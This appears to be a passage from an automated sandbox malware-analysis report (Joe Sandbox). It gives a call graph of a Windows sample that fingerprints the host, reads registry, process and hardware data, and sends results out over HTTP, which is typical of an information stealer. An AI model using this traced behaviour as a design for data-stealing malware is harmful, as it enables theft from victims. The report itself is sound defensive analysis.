API calls 75880->75881 75882 40493d 75881->75882 75883 416ea0 lstrcpy 75882->75883 75884 404946 75883->75884 75885 416f20 3 API calls 75884->75885 75886 404964 75885->75886 75887 416ea0 lstrcpy 75886->75887 75888 40496d 75887->75888 75889 416fb0 4 API calls 75888->75889 75890 40498c 75889->75890 75891 416ea0 lstrcpy 75890->75891 75892 404995 75891->75892 75893 416fb0 4 API calls 75892->75893 75894 4049b6 75893->75894 75895 416ea0 lstrcpy 75894->75895 75896 4049bf 75895->75896 75897 416fb0 4 API calls 75896->75897 75898 4049df 75897->75898 75899 416ea0 lstrcpy 75898->75899 75900 4049e8 75899->75900 75901 416fb0 4 API calls 75900->75901 75902 404a07 75901->75902 75903 416ea0 lstrcpy 75902->75903 75904 404a10 75903->75904 75905 416f20 3 API calls 75904->75905 75906 404a2e 75905->75906 75907 416ea0 lstrcpy 75906->75907 75908 404a37 75907->75908 75909 416d40 lstrcpy 75908->75909 75910 404a52 75909->75910 75911 416f20 3 API calls 75910->75911 75912 404a73 75911->75912 75913 416f20 3 API calls 75912->75913 75914 404a7a 75913->75914 75915 416ea0 lstrcpy 75914->75915 75916 404a86 75915->75916 75917 404aa7 lstrlen 75916->75917 75918 404aba 75917->75918 75919 404ac3 lstrlen 75918->75919 76625 4170d0 75919->76625 75921 404ad3 HttpSendRequestA 75922 404af2 InternetReadFile 75921->75922 75923 404b27 InternetCloseHandle 75922->75923 75928 404b1e 75922->75928 75926 416e00 75923->75926 75925 416fb0 4 API calls 75925->75928 75926->75848 75927 416ea0 lstrcpy 75927->75928 75928->75922 75928->75923 75928->75925 75928->75927 76635 4170d0 75929->76635 75931 40fb04 StrCmpCA 75932 40fb17 75931->75932 75933 40fb0f ExitProcess 75931->75933 75934 40fb27 strtok_s 75932->75934 75937 40fb34 75934->75937 75935 40fccc 75935->74980 75936 40fca8 strtok_s 75936->75937 75937->75935 75937->75936 75938 40fc8b StrCmpCA 75937->75938 75939 40fc6c StrCmpCA 75937->75939 75940 40fb9d StrCmpCA 75937->75940 75941 40fbed StrCmpCA 75937->75941 75942 40fc4d StrCmpCA 75937->75942 75943 40fc2e StrCmpCA 75937->75943 
75944 40fbbf StrCmpCA 75937->75944 75945 40fc0f StrCmpCA 75937->75945 75946 416e20 lstrlen lstrcpy 75937->75946 75938->75936 75938->75937 75939->75937 75940->75937 75941->75937 75942->75937 75943->75937 75944->75937 75945->75937 75946->75937 75948 416da0 lstrcpy 75947->75948 75949 401513 75948->75949 75950 416da0 lstrcpy 75949->75950 75951 401525 75950->75951 75952 416da0 lstrcpy 75951->75952 75953 401537 75952->75953 75954 416da0 lstrcpy 75953->75954 75955 401549 75954->75955 75956 405610 75955->75956 75957 416da0 lstrcpy 75956->75957 75958 405629 75957->75958 75959 404470 3 API calls 75958->75959 75960 405635 75959->75960 75961 416d40 lstrcpy 75960->75961 75962 40566a 75961->75962 75963 416d40 lstrcpy 75962->75963 75964 405677 75963->75964 75965 416d40 lstrcpy 75964->75965 75966 405684 75965->75966 75967 416d40 lstrcpy 75966->75967 75968 405691 75967->75968 75969 416d40 lstrcpy 75968->75969 75970 40569e InternetOpenA StrCmpCA 75969->75970 75971 4056cd 75970->75971 75972 405c70 InternetCloseHandle 75971->75972 75974 415260 3 API calls 75971->75974 75973 405c8d 75972->75973 75976 4094a0 4 API calls 75973->75976 75975 4056ec 75974->75975 75977 416f20 3 API calls 75975->75977 75978 405c93 75976->75978 75979 4056ff 75977->75979 75981 416e20 2 API calls 75978->75981 75983 405ccc ctype 75978->75983 75980 416ea0 lstrcpy 75979->75980 75986 405708 75980->75986 75982 405caa 75981->75982 75984 416fb0 4 API calls 75982->75984 75988 416da0 lstrcpy 75983->75988 75985 405cc0 75984->75985 75987 416ea0 lstrcpy 75985->75987 75989 416fb0 4 API calls 75986->75989 75987->75983 75997 405cfc 75988->75997 75990 405732 75989->75990 75991 416ea0 lstrcpy 75990->75991 75992 40573b 75991->75992 75993 416fb0 4 API calls 75992->75993 75994 40575a 75993->75994 75995 416ea0 lstrcpy 75994->75995 75996 405763 75995->75996 75998 416f20 3 API calls 75996->75998 75997->74986 75999 405781 75998->75999 76000 416ea0 lstrcpy 75999->76000 76001 40578a 76000->76001 76002 416fb0 4 API calls 76001->76002 
76003 4057a9 76002->76003 76004 416ea0 lstrcpy 76003->76004 76005 4057b2 76004->76005 76006 416fb0 4 API calls 76005->76006 76007 4057d1 76006->76007 76008 416ea0 lstrcpy 76007->76008 76009 4057da 76008->76009 76010 416fb0 4 API calls 76009->76010 76011 405806 76010->76011 76012 416f20 3 API calls 76011->76012 76013 40580d 76012->76013 76014 416ea0 lstrcpy 76013->76014 76015 405816 76014->76015 76016 40582c InternetConnectA 76015->76016 76016->75972 76017 40585c HttpOpenRequestA 76016->76017 76019 405c63 InternetCloseHandle 76017->76019 76020 4058bb 76017->76020 76019->75972 76021 416fb0 4 API calls 76020->76021 76022 4058cf 76021->76022 76023 416ea0 lstrcpy 76022->76023 76024 4058d8 76023->76024 76025 416f20 3 API calls 76024->76025 76026 4058f6 76025->76026 76027 416ea0 lstrcpy 76026->76027 76028 4058ff 76027->76028 76029 416fb0 4 API calls 76028->76029 76030 40591e 76029->76030 76031 416ea0 lstrcpy 76030->76031 76032 405927 76031->76032 76033 416fb0 4 API calls 76032->76033 76034 405948 76033->76034 76035 416ea0 lstrcpy 76034->76035 76036 405951 76035->76036 76037 416fb0 4 API calls 76036->76037 76038 405971 76037->76038 76039 416ea0 lstrcpy 76038->76039 76040 40597a 76039->76040 76041 416fb0 4 API calls 76040->76041 76042 405999 76041->76042 76043 416ea0 lstrcpy 76042->76043 76044 4059a2 76043->76044 76045 416f20 3 API calls 76044->76045 76046 4059c0 76045->76046 76047 416ea0 lstrcpy 76046->76047 76048 4059c9 76047->76048 76049 416fb0 4 API calls 76048->76049 76050 4059e8 76049->76050 76051 416ea0 lstrcpy 76050->76051 76052 4059f1 76051->76052 76053 416fb0 4 API calls 76052->76053 76054 405a10 76053->76054 76055 416ea0 lstrcpy 76054->76055 76056 405a19 76055->76056 76057 416f20 3 API calls 76056->76057 76058 405a37 76057->76058 76059 416ea0 lstrcpy 76058->76059 76060 405a40 76059->76060 76061 416fb0 4 API calls 76060->76061 76062 405a5f 76061->76062 76063 416ea0 lstrcpy 76062->76063 76064 405a68 76063->76064 76065 416fb0 4 API calls 76064->76065 76066 405a89 
76065->76066 76067 416ea0 lstrcpy 76066->76067 76068 405a92 76067->76068 76069 416fb0 4 API calls 76068->76069 76070 405ab2 76069->76070 76071 416ea0 lstrcpy 76070->76071 76072 405abb 76071->76072 76073 416fb0 4 API calls 76072->76073 76074 405ada 76073->76074 76075 416ea0 lstrcpy 76074->76075 76076 405ae3 76075->76076 76077 416f20 3 API calls 76076->76077 76078 405b01 76077->76078 76079 416ea0 lstrcpy 76078->76079 76080 405b0a 76079->76080 76081 405b1d lstrlen 76080->76081 76636 4170d0 76081->76636 76083 405b2e lstrlen GetProcessHeap HeapAlloc 76637 4170d0 76083->76637 76085 405b5b lstrlen 76638 4170d0 76085->76638 76087 405b6b memcpy 76639 4170d0 76087->76639 76089 405b84 lstrlen 76090 405b94 76089->76090 76091 405b9d lstrlen memcpy 76090->76091 76640 4170d0 76091->76640 76093 405bc7 lstrlen 76641 4170d0 76093->76641 76095 405bd7 HttpSendRequestA 76096 405be2 InternetReadFile 76095->76096 76097 405c17 InternetCloseHandle 76096->76097 76101 405c0e 76096->76101 76097->76019 76099 416fb0 4 API calls 76099->76101 76100 416ea0 lstrcpy 76100->76101 76101->76096 76101->76097 76101->76099 76101->76100 76642 4170d0 76102->76642 76104 40f3d7 strtok_s 76108 40f3e4 76104->76108 76105 40f4b1 76105->74988 76106 40f48d strtok_s 76106->76108 76107 416e20 lstrlen lstrcpy 76107->76108 76108->76105 76108->76106 76108->76107 76643 4170d0 76109->76643 76111 40f227 strtok_s 76114 40f234 76111->76114 76112 40f387 76112->74996 76113 40f363 strtok_s 76113->76114 76114->76112 76114->76113 76115 40f314 StrCmpCA 76114->76115 76116 40f297 StrCmpCA 76114->76116 76117 40f2d7 StrCmpCA 76114->76117 76118 416e20 lstrlen lstrcpy 76114->76118 76115->76114 76116->76114 76117->76114 76118->76114 76120 416d40 lstrcpy 76119->76120 76121 40fd26 76120->76121 76122 416fb0 4 API calls 76121->76122 76123 40fd37 76122->76123 76124 416ea0 lstrcpy 76123->76124 76125 40fd40 76124->76125 76126 416fb0 4 API calls 76125->76126 76127 40fd5b 76126->76127 76128 416ea0 lstrcpy 76127->76128 76129 40fd64 76128->76129 
76130 416fb0 4 API calls 76129->76130 76131 40fd7d 76130->76131 76132 416ea0 lstrcpy 76131->76132 76133 40fd86 76132->76133 76134 416fb0 4 API calls 76133->76134 76135 40fda1 76134->76135 76136 416ea0 lstrcpy 76135->76136 76137 40fdaa 76136->76137 76138 416fb0 4 API calls 76137->76138 76139 40fdc3 76138->76139 76140 416ea0 lstrcpy 76139->76140 76141 40fdcc 76140->76141 76142 416fb0 4 API calls 76141->76142 76143 40fde7 76142->76143 76144 416ea0 lstrcpy 76143->76144 76145 40fdf0 76144->76145 76146 416fb0 4 API calls 76145->76146 76147 40fe09 76146->76147 76148 416ea0 lstrcpy 76147->76148 76149 40fe12 76148->76149 76150 416fb0 4 API calls 76149->76150 76151 40fe2d 76150->76151 76152 416ea0 lstrcpy 76151->76152 76153 40fe36 76152->76153 76154 416fb0 4 API calls 76153->76154 76155 40fe4f 76154->76155 76156 416ea0 lstrcpy 76155->76156 76157 40fe58 76156->76157 76158 416fb0 4 API calls 76157->76158 76159 40fe76 76158->76159 76160 416ea0 lstrcpy 76159->76160 76161 40fe7f 76160->76161 76162 4141c0 6 API calls 76161->76162 76163 40fe96 76162->76163 76164 416f20 3 API calls 76163->76164 76165 40fea9 76164->76165 76166 416ea0 lstrcpy 76165->76166 76167 40feb2 76166->76167 76168 416fb0 4 API calls 76167->76168 76169 40fedc 76168->76169 76170 416ea0 lstrcpy 76169->76170 76171 40fee5 76170->76171 76172 416fb0 4 API calls 76171->76172 76173 40ff05 76172->76173 76174 416ea0 lstrcpy 76173->76174 76175 40ff0e 76174->76175 76644 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 76175->76644 76177 40ff1e 76178 416fb0 4 API calls 76177->76178 76179 40ff2e 76178->76179 76180 416ea0 lstrcpy 76179->76180 76181 40ff37 76180->76181 76182 416fb0 4 API calls 76181->76182 76183 40ff56 76182->76183 76184 416ea0 lstrcpy 76183->76184 76185 40ff5f 76184->76185 76186 416fb0 4 API calls 76185->76186 76187 40ff80 76186->76187 76188 416ea0 lstrcpy 76187->76188 76189 40ff89 76188->76189 76647 414380 GetCurrentProcess IsWow64Process 76189->76647 76192 416fb0 4 API calls 76193 40ffa9 76192->76193 76194 
416ea0 lstrcpy 76193->76194 76195 40ffb2 76194->76195 76196 416fb0 4 API calls 76195->76196 76197 40ffd1 76196->76197 76198 416ea0 lstrcpy 76197->76198 76199 40ffda 76198->76199 76200 416fb0 4 API calls 76199->76200 76201 40fffb 76200->76201 76202 416ea0 lstrcpy 76201->76202 76203 410004 76202->76203 76649 4143c0 GetProcessHeap HeapAlloc GetUserNameA 76203->76649 76205 410014 76206 416fb0 4 API calls 76205->76206 76207 410024 76206->76207 76208 416ea0 lstrcpy 76207->76208 76209 41002d 76208->76209 76210 416fb0 4 API calls 76209->76210 76211 41004c 76210->76211 76212 416ea0 lstrcpy 76211->76212 76213 410055 76212->76213 76214 416fb0 4 API calls 76213->76214 76215 410075 76214->76215 76216 416ea0 lstrcpy 76215->76216 76217 41007e 76216->76217 76218 414400 3 API calls 76217->76218 76219 41008e 76218->76219 76220 416fb0 4 API calls 76219->76220 76221 41009e 76220->76221 76222 416ea0 lstrcpy 76221->76222 76223 4100a7 76222->76223 76224 416fb0 4 API calls 76223->76224 76225 4100c6 76224->76225 76226 416ea0 lstrcpy 76225->76226 76227 4100cf 76226->76227 76228 416fb0 4 API calls 76227->76228 76229 4100f0 76228->76229 76230 416ea0 lstrcpy 76229->76230 76231 4100f9 76230->76231 76650 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 76231->76650 76233 410109 76234 416fb0 4 API calls 76233->76234 76235 410119 76234->76235 76236 416ea0 lstrcpy 76235->76236 76237 410122 76236->76237 76238 416fb0 4 API calls 76237->76238 76239 410141 76238->76239 76240 416ea0 lstrcpy 76239->76240 76241 41014a 76240->76241 76242 416fb0 4 API calls 76241->76242 76243 41016b 76242->76243 76244 416ea0 lstrcpy 76243->76244 76245 410174 76244->76245 76651 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 76245->76651 76248 416fb0 4 API calls 76249 410194 76248->76249 76250 416ea0 lstrcpy 76249->76250 76251 41019d 76250->76251 76252 416fb0 4 API calls 76251->76252 76253 4101bc 76252->76253 76254 416ea0 lstrcpy 76253->76254 76255 4101c5 76254->76255 76256 416fb0 4 API calls 76255->76256 76257 
4101e5 76256->76257 76258 416ea0 lstrcpy 76257->76258 76259 4101ee 76258->76259 76654 414530 GetUserDefaultLocaleName 76259->76654 76262 416fb0 4 API calls 76263 41020e 76262->76263 76264 416ea0 lstrcpy 76263->76264 76265 410217 76264->76265 76266 416fb0 4 API calls 76265->76266 76267 410236 76266->76267 76268 416ea0 lstrcpy 76267->76268 76269 41023f 76268->76269 76270 416fb0 4 API calls 76269->76270 76271 410260 76270->76271 76272 416ea0 lstrcpy 76271->76272 76273 410269 76272->76273 76659 414570 76273->76659 76275 410280 76276 416f20 3 API calls 76275->76276 76277 410293 76276->76277 76278 416ea0 lstrcpy 76277->76278 76279 41029c 76278->76279 76280 416fb0 4 API calls 76279->76280 76281 4102c6 76280->76281 76282 416ea0 lstrcpy 76281->76282 76283 4102cf 76282->76283 76284 416fb0 4 API calls 76283->76284 76285 4102ef 76284->76285 76286 416ea0 lstrcpy 76285->76286 76287 4102f8 76286->76287 76671 414710 GetSystemPowerStatus 76287->76671 76290 416fb0 4 API calls 76291 410318 76290->76291 76292 416ea0 lstrcpy 76291->76292 76293 410321 76292->76293 76294 416fb0 4 API calls 76293->76294 76295 410340 76294->76295 76296 416ea0 lstrcpy 76295->76296 76297 410349 76296->76297 76298 416fb0 4 API calls 76297->76298 76299 41036a 76298->76299 76300 416ea0 lstrcpy 76299->76300 76301 410373 76300->76301 76302 41037e GetCurrentProcessId 76301->76302 76673 415b70 OpenProcess 76302->76673 76305 416f20 3 API calls 76306 4103a4 76305->76306 76307 416ea0 lstrcpy 76306->76307 76308 4103ad 76307->76308 76309 416fb0 4 API calls 76308->76309 76310 4103d7 76309->76310 76311 416ea0 lstrcpy 76310->76311 76312 4103e0 76311->76312 76313 416fb0 4 API calls 76312->76313 76314 410400 76313->76314 76315 416ea0 lstrcpy 76314->76315 76316 410409 76315->76316 76678 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 76316->76678 76318 410419 76319 416fb0 4 API calls 76318->76319 76320 410429 76319->76320 76321 416ea0 lstrcpy 76320->76321 76322 410432 76321->76322 76323 416fb0 4 API calls 76322->76323 76324 
410451 76323->76324 76325 416ea0 lstrcpy 76324->76325 76326 41045a 76325->76326 76327 416fb0 4 API calls 76326->76327 76328 41047b 76327->76328 76329 416ea0 lstrcpy 76328->76329 76330 410484 76329->76330 76681 414800 76330->76681 76333 416fb0 4 API calls 76334 4104a4 76333->76334 76335 416ea0 lstrcpy 76334->76335 76336 4104ad 76335->76336 76337 416fb0 4 API calls 76336->76337 76338 4104cc 76337->76338 76339 416ea0 lstrcpy 76338->76339 76340 4104d5 76339->76340 76341 416fb0 4 API calls 76340->76341 76342 4104f6 76341->76342 76343 416ea0 lstrcpy 76342->76343 76344 4104ff 76343->76344 76696 4147c0 GetSystemInfo wsprintfA 76344->76696 76346 41050f 76347 416fb0 4 API calls 76346->76347 76348 41051f 76347->76348 76349 416ea0 lstrcpy 76348->76349 76350 410528 76349->76350 76351 416fb0 4 API calls 76350->76351 76352 410547 76351->76352 76353 416ea0 lstrcpy 76352->76353 76354 410550 76353->76354 76355 416fb0 4 API calls 76354->76355 76356 410570 76355->76356 76357 416ea0 lstrcpy 76356->76357 76358 410579 76357->76358 76697 414960 GetProcessHeap HeapAlloc 76358->76697 76360 410589 76361 416fb0 4 API calls 76360->76361 76362 410599 76361->76362 76363 416ea0 lstrcpy 76362->76363 76364 4105a2 76363->76364 76365 416fb0 4 API calls 76364->76365 76366 4105c1 76365->76366 76367 416ea0 lstrcpy 76366->76367 76368 4105ca 76367->76368 76369 416fb0 4 API calls 76368->76369 76370 4105eb 76369->76370 76371 416ea0 lstrcpy 76370->76371 76372 4105f4 76371->76372 76702 414ed0 76372->76702 76375 416f20 3 API calls 76376 41061e 76375->76376 76377 416ea0 lstrcpy 76376->76377 76378 410627 76377->76378 76379 416fb0 4 API calls 76378->76379 76380 410651 76379->76380 76381 416ea0 lstrcpy 76380->76381 76382 41065a 76381->76382 76383 416fb0 4 API calls 76382->76383 76384 41067a 76383->76384 76385 416ea0 lstrcpy 76384->76385 76386 410683 76385->76386 76387 416fb0 4 API calls 76386->76387 76388 4106a2 76387->76388 76389 416ea0 lstrcpy 76388->76389 76390 4106ab 76389->76390 76707 414a00 76390->76707 
76392 4106c2 76393 416f20 3 API calls 76392->76393 76394 4106d5 76393->76394 76395 416ea0 lstrcpy 76394->76395 76396 4106de 76395->76396 76397 416fb0 4 API calls 76396->76397 76398 41070a 76397->76398 76399 416ea0 lstrcpy 76398->76399 76400 410713 76399->76400 76401 416fb0 4 API calls 76400->76401 76402 410732 76401->76402 76403 416ea0 lstrcpy 76402->76403 76404 41073b 76403->76404 76405 416fb0 4 API calls 76404->76405 76406 41075c 76405->76406 76407 416ea0 lstrcpy 76406->76407 76408 410765 76407->76408 76409 416fb0 4 API calls 76408->76409 76410 410784 76409->76410 76411 416ea0 lstrcpy 76410->76411 76412 41078d 76411->76412 76413 416fb0 4 API calls 76412->76413 76414 4107ae 76413->76414 76415 416ea0 lstrcpy 76414->76415 76416 4107b7 76415->76416 76715 414ae0 76416->76715 76418 4107d3 76419 416f20 3 API calls 76418->76419 76420 4107e6 76419->76420 76421 416ea0 lstrcpy 76420->76421 76422 4107ef 76421->76422 76423 416fb0 4 API calls 76422->76423 76424 410819 76423->76424 76425 416ea0 lstrcpy 76424->76425 76426 410822 76425->76426 76427 416fb0 4 API calls 76426->76427 76428 410843 76427->76428 76429 416ea0 lstrcpy 76428->76429 76430 41084c 76429->76430 76431 414ae0 17 API calls 76430->76431 76432 410868 76431->76432 76433 416f20 3 API calls 76432->76433 76434 41087b 76433->76434 76435 416ea0 lstrcpy 76434->76435 76436 410884 76435->76436 76437 416fb0 4 API calls 76436->76437 76438 4108ae 76437->76438 76439 416ea0 lstrcpy 76438->76439 76440 4108b7 76439->76440 76441 416fb0 4 API calls 76440->76441 76442 4108d6 76441->76442 76443 416ea0 lstrcpy 76442->76443 76444 4108df 76443->76444 76445 416fb0 4 API calls 76444->76445 76446 410900 76445->76446 76447 416ea0 lstrcpy 76446->76447 76448 410909 76447->76448 76751 414de0 76448->76751 76450 410920 76451 416f20 3 API calls 76450->76451 76452 410933 76451->76452 76453 416ea0 lstrcpy 76452->76453 76454 41093c 76453->76454 76455 41095a lstrlen 76454->76455 76456 41096a 76455->76456 76457 416d40 lstrcpy 76456->76457 76458 41097c 
76457->76458 76459 401500 lstrcpy 76458->76459 76460 41098a 76459->76460 76761 404dc0 76460->76761 76462 410996 76462->75000 76942 4170d0 76463->76942 76465 404cc9 InternetOpenUrlA 76469 404ce1 76465->76469 76466 404cea InternetReadFile 76466->76469 76467 404d5c InternetCloseHandle InternetCloseHandle 76468 404da8 76467->76468 76468->75004 76469->76466 76469->76467 76943 4092b0 76470->76943 76472 40ef93 76473 40f1cf 76472->76473 76475 40efb4 76472->76475 76474 401500 lstrcpy 76473->76474 76476 40f1dd 76474->76476 76477 40efcd StrCmpCA 76475->76477 77107 40ea90 76476->77107 76479 40f04f 76477->76479 76480 40efd8 76477->76480 76483 40f06e StrCmpCA 76479->76483 76482 416da0 lstrcpy 76480->76482 76484 40eff0 76482->76484 76485 40f07d 76483->76485 76522 40f14e 76483->76522 76486 401500 lstrcpy 76484->76486 76487 416d40 lstrcpy 76485->76487 76488 40f01e 76486->76488 76490 40f08a 76487->76490 76491 416da0 lstrcpy 76488->76491 76489 40f17d StrCmpCA 76493 40f188 76489->76493 76494 40f1c7 76489->76494 76495 416fb0 4 API calls 76490->76495 76492 40f032 76491->76492 76496 416da0 lstrcpy 76492->76496 76497 401500 lstrcpy 76493->76497 76494->75008 76498 40f0b2 76495->76498 76499 40f04a 76496->76499 76500 40f196 76497->76500 76501 416f20 3 API calls 76498->76501 76946 40e420 76499->76946 76503 416da0 lstrcpy 76500->76503 76504 40f0b9 76501->76504 76505 40f1aa 76503->76505 76506 416fb0 4 API calls 76504->76506 76508 416da0 lstrcpy 76505->76508 76507 40f0c0 76506->76507 76509 416ea0 lstrcpy 76507->76509 76510 40f1c2 76508->76510 76512 40f0c9 76509->76512 77062 40e910 76510->77062 76522->76489 76600 404486 76599->76600 76631 414ff0 malloc 76600->76631 76602 4044af 76632 414ff0 malloc 76602->76632 76604 4044c5 76633 414ff0 malloc 76604->76633 76606 4044db 76607 4044f5 lstrlen 76606->76607 76634 4170d0 76607->76634 76609 404505 InternetCrackUrlA 76610 404524 76609->76610 76610->75788 76612 416d40 lstrcpy 76611->76612 76613 415274 76612->76613 76614 416d40 lstrcpy 76613->76614 76615 
415282 GetSystemTime 76614->76615 76617 415299 76615->76617 76616 416da0 lstrcpy 76618 4152fc 76616->76618 76617->76616 76618->75803 76620 416f31 76619->76620 76621 416f88 76620->76621 76623 416f68 lstrcpy lstrcat 76620->76623 76622 416da0 lstrcpy 76621->76622 76624 416f94 76622->76624 76623->76621 76624->75806 76625->75921 76627 4094d9 LocalAlloc 76626->76627 76628 404bae 76626->76628 76627->76628 76629 4094f4 CryptStringToBinaryA 76627->76629 76628->75809 76628->75812 76629->76628 76630 409519 LocalFree 76629->76630 76630->76628 76631->76602 76632->76604 76633->76606 76634->76609 76635->75931 76636->76083 76637->76085 76638->76087 76639->76089 76640->76093 76641->76095 76642->76104 76643->76111 76645 414362 RegCloseKey 76644->76645 76646 414345 RegQueryValueExA 76644->76646 76645->76177 76646->76645 76648 40ff99 76647->76648 76648->76192 76649->76205 76650->76233 76652 4144f7 wsprintfA 76651->76652 76653 410184 76651->76653 76652->76653 76653->76248 76655 4101fe 76654->76655 76656 41455a 76654->76656 76655->76262 76923 415420 LocalAlloc CharToOemW 76656->76923 76658 414566 76658->76655 76660 416d40 lstrcpy 76659->76660 76661 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 76660->76661 76670 4145e2 76661->76670 76662 414603 GetLocaleInfoA 76662->76670 76663 4146d5 76664 4146e5 76663->76664 76665 4146db LocalFree 76663->76665 76667 416da0 lstrcpy 76664->76667 76665->76664 76666 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76666->76670 76668 4146f4 76667->76668 76668->76275 76669 416ea0 lstrcpy 76669->76670 76670->76662 76670->76663 76670->76666 76670->76669 76672 410308 76671->76672 76672->76290 76674 415b93 K32GetModuleFileNameExA CloseHandle 76673->76674 76675 415bb5 76673->76675 76674->76675 76676 416d40 lstrcpy 76675->76676 76677 410391 76676->76677 76677->76305 76679 4147a2 RegCloseKey 76678->76679 76680 414785 RegQueryValueExA 76678->76680 76679->76318 76680->76679 76682 414836 GetLogicalProcessorInformationEx 76681->76682 76683 414855 GetLastError 
76682->76683 76686 4148ab 76682->76686 76684 414860 76683->76684 76685 41489f 76683->76685 76694 414869 76684->76694 76689 410494 76685->76689 76927 4150f0 GetProcessHeap HeapFree 76685->76927 76926 4150f0 GetProcessHeap HeapFree 76686->76926 76689->76333 76692 4148fd 76692->76689 76695 414906 wsprintfA 76692->76695 76693 414893 76693->76689 76694->76682 76694->76693 76924 4150f0 GetProcessHeap HeapFree 76694->76924 76925 415110 GetProcessHeap HeapAlloc 76694->76925 76695->76689 76696->76346 76698 415090 76697->76698 76699 41498a GlobalMemoryStatusEx 76698->76699 76700 4149a0 __aulldiv 76699->76700 76701 4149d8 wsprintfA 76700->76701 76701->76360 76703 414ee8 GetProcessHeap HeapAlloc wsprintfA 76702->76703 76705 416d40 lstrcpy 76703->76705 76706 41060b 76705->76706 76706->76375 76708 416d40 lstrcpy 76707->76708 76714 414a16 76708->76714 76709 414a50 76711 416da0 lstrcpy 76709->76711 76710 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76710->76714 76712 414ac9 76711->76712 76712->76392 76713 416ea0 lstrcpy 76713->76714 76714->76709 76714->76710 76714->76713 76716 416d40 lstrcpy 76715->76716 76717 414af9 RegOpenKeyExA 76716->76717 76718 414b4b 76717->76718 76719 414b6d 76717->76719 76720 416da0 lstrcpy 76718->76720 76721 414db0 RegCloseKey 76719->76721 76722 414b95 RegEnumKeyExA 76719->76722 76731 414b5a 76720->76731 76725 416da0 lstrcpy 76721->76725 76723 414dab 76722->76723 76724 414bdc wsprintfA RegOpenKeyExA 76722->76724 76723->76721 76726 414c22 RegCloseKey RegCloseKey 76724->76726 76727 414c5e RegQueryValueExA 76724->76727 76725->76731 76728 416da0 lstrcpy 76726->76728 76729 414c97 lstrlen 76727->76729 76730 414d9e RegCloseKey 76727->76730 76728->76731 76729->76730 76732 414cad 76729->76732 76730->76723 76731->76418 76733 416fb0 4 API calls 76732->76733 76734 414cc4 76733->76734 76735 416ea0 lstrcpy 76734->76735 76736 414cd0 76735->76736 76737 416fb0 4 API calls 76736->76737 76738 414cf4 76737->76738 76739 416ea0 lstrcpy 76738->76739 76740 414d00 76739->76740 76741 
414d0b RegQueryValueExA 76740->76741 76741->76730 76742 414d40 76741->76742 76743 416fb0 4 API calls 76742->76743 76744 414d57 76743->76744 76745 416ea0 lstrcpy 76744->76745 76746 414d63 76745->76746 76747 416fb0 4 API calls 76746->76747 76748 414d87 76747->76748 76749 416ea0 lstrcpy 76748->76749 76750 414d93 76749->76750 76750->76730 76752 416d40 lstrcpy 76751->76752 76753 414df9 CreateToolhelp32Snapshot Process32First 76752->76753 76754 414e25 Process32Next 76753->76754 76755 414e9a CloseHandle 76753->76755 76754->76755 76757 414e3a 76754->76757 76756 416da0 lstrcpy 76755->76756 76758 414eb3 76756->76758 76757->76754 76759 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76757->76759 76760 416ea0 lstrcpy 76757->76760 76758->76450 76759->76757 76760->76757 76762 416da0 lstrcpy 76761->76762 76763 404dd9 76762->76763 76764 404470 3 API calls 76763->76764 76765 404de5 76764->76765 76928 4155a0 76765->76928 76767 404e3e 76768 404e49 lstrlen 76767->76768 76769 404e59 76768->76769 76770 4155a0 4 API calls 76769->76770 76771 404e6a 76770->76771 76772 416d40 lstrcpy 76771->76772 76773 404e7d 76772->76773 76774 416d40 lstrcpy 76773->76774 76775 404e8a 76774->76775 76776 416d40 lstrcpy 76775->76776 76777 404e97 76776->76777 76778 416d40 lstrcpy 76777->76778 76779 404ea4 76778->76779 76780 416d40 lstrcpy 76779->76780 76781 404eb1 InternetOpenA StrCmpCA 76780->76781 76782 404ee3 76781->76782 76783 405578 InternetCloseHandle 76782->76783 76784 415260 3 API calls 76782->76784 76790 40558d ctype 76783->76790 76785 404f02 76784->76785 76786 416f20 3 API calls 76785->76786 76787 404f15 76786->76787 76788 416ea0 lstrcpy 76787->76788 76789 404f1e 76788->76789 76791 416fb0 4 API calls 76789->76791 76793 416da0 lstrcpy 76790->76793 76792 404f5f 76791->76792 76794 416f20 3 API calls 76792->76794 76802 4055c7 76793->76802 76795 404f66 76794->76795 76796 416fb0 4 API calls 76795->76796 76797 404f6d 76796->76797 76798 416ea0 lstrcpy 76797->76798 76799 404f76 76798->76799 76800 416fb0 4 API calls 

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 2238633743-0
                                                                                                      • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                      • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                      • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                      • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 00411669
                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004116D2
